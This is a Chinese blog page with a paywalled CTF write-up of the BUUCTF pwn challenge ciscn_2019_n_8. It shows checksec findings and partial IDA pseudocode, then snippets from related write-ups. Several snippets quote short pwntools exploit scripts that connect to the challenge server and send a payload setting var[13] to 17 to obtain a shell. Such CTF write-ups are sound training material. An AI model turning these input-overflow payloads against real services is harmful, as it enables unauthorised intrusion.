ciscn_2019_n_8 详解

程序安全分析与payload生成

最新推荐文章于 2025-02-20 15:16:49 发布

原创

最新推荐文章于 2025-02-20 15:16:49 发布 · 432 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#安全

首先运行checksec

在这里插入图片描述
得知
1、程序架构是 i386,32位，小端模式
2、got表可读可写
3、启用栈保护
4、栈中数据没有执行权限
5、启用位置无关可执行文件即编译时将程序编译为位置无关，程序运行时各个段加载的虚拟地址在装载时才确定

./ciscn_2019-n-8

得知输入一些字符，然后输出。需要猜对输入字符串。
丢入IDA看看，按F5

int __cdecl main(int argc, const char **argv, const char **envp)
{
   
   
  int v4; // [esp-14h] [ebp-20h]
  int v5; // [esp-10h] [ebp-1Ch]

  var[13] = 0;
  var[14] = 0;
  init();
  puts("What's your name?");
  __isoc99_scanf("%s", var

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

北辰911

关注关注

3
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【BUUCTF - PWN】ciscn_2019_n_8

古月浪子的博客

03-27

1243

checksec一下，好叭全开 IDA打开看看，var是int数组，如果var[13]=0x11的话就能get flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambda x,y:io.sendlin...

buuctf——ciscn_2019_n_8

qq_41560595的博客

03-21

718

查看权限开了好多权限查看源代码分析观察，var数组是int类型，在内存中占了4个字节。输入一个字符串，令var[13]处的值是17，且这个值占4个字节，就能拿到shell。 var中每一个元素占4个字节，payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节，就要用p64打包。解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF pwn ciscn_2019_n_8

菜的只能随便写写博客

02-03

2755

0x01 文件分析文件很简单，32位，保护都开得差不多。 0x02 运行输入并且回显。 0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...

ciscn_2019_n_8

m0sway的博客

03-16

877

Buu PWN ciscn_2019_n_8 详解writeup

buuctf_ciscn_2019_n_5

最新发布

2301_81060697的博客

02-20

423

buuctf

BUUCTF ciscn_2019_n_1

RookieMOR的博客

05-14

824

1.下载文件，用checksec一下： 2.用IDA64查看，进入func函数：当v2=11.28125时获得flag，但只有v1的输入，没有v2输入。因为有一个gets函数，点击v1，v2可以知道，v1与v2差44个字节，可以通过输入v1的值去改变v2的值，实现栈溢出。查看汇编可以看到有一个uconiss的比较指令，把xmm0与cs:dword_4007F4，由movss可以知道xmme0是v1或v2的值，那么点击dword_4007F4 看到一个 dd ，百度一下可以知道，.

【BUUCTFPWN】ciscn_2019_n_5 shellcode

m0_55368674的博客

01-13

630

【BUUCTFPWN】ciscn_2019_n_5题解

BUUCTF ciscn_2019_n_1 做题笔记

小白垃圾笔记2

03-31

550

没有canary，没有nx，没有pie，只有一个relro，这个好像是堆栈地址随机化，听说是开启了partial后got表不可修改，开启full后，好吧不瞎说了，问。因为它读的时候其实还是用的gets函数，而gets函数的话其实是会将每一个字符都转换成对应的acsii然后进行存储。师傅说是输入一个字节一个自己的时候是顺着，按照dword或者dword的时候就是小端序了。是汇编，我看了半天没看懂，我第一次自己做题，没反应过来。这道题是昨天做的，今天用了一位师父的镜像，好像挺好用的不过我用的还不熟练。

[BUUCTF] ciscn_2019_n_8

Lucien_Carr的博客

04-14

605

这道题非常简单（甚至比ret2text简单...），只需要满足让系统调用system函数的条件，即将var[13]这个数组里全部填上17即可。checksec --file='filename' # filename为下载文件的自定义名称。观察选择条件，只需要满足var[13] = 17就可以。前面有scanf函数，可以直接向var数组输入。开了canary、NX和PIE，似乎防得很严实。主函数里就调用了system函数，运气很好。32位程序，放到IDA中继续分析。攻击成功，运行结果如下。

buuctf之ciscn_2019_n_8

weixin_54452942的博客

04-12

849

两个方法解题

buuctf ciscn_2019_n_8

carol2358的博客

04-15

331

ida: 直接有sh，只要让var[13]等于17就可以 exp： from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvl...

[buuctf]ciscn_2019_n_8

逆向萌新的博客

06-19

577

[buuctf]ciscn_2019_n_8

[BUUCTF-pwn]——ciscn_2019_n_8

Y_peak的博客

02-10

3026

[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目上去checksec一下,吓一跳保护基本全开了。在IDA中一看，开心了。如此简单　只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +

buuctf pwn ciscn_2019_n_8

zip471642048的博客

06-21

424

checksec 看一下基本信息把程序拖到ida32分析一波，可以看到读入字符串给了 var 然后后面的v4，v5没起作用，然后判断了var[13]是不是等于\x11,是就给一个shell 所以只要让我们输入的字符后13位等于...

Buuctf(pwn)ciscn_2019_n_8

半岛铁盒的博客

03-28

301

保护开的挺全; from pwn import* r=remote('node3.buuoj.cn',28155) payload = p32(17)*14 r.sendline(payload) r.interactive() 没利用漏洞,简单的输入满足条件就好了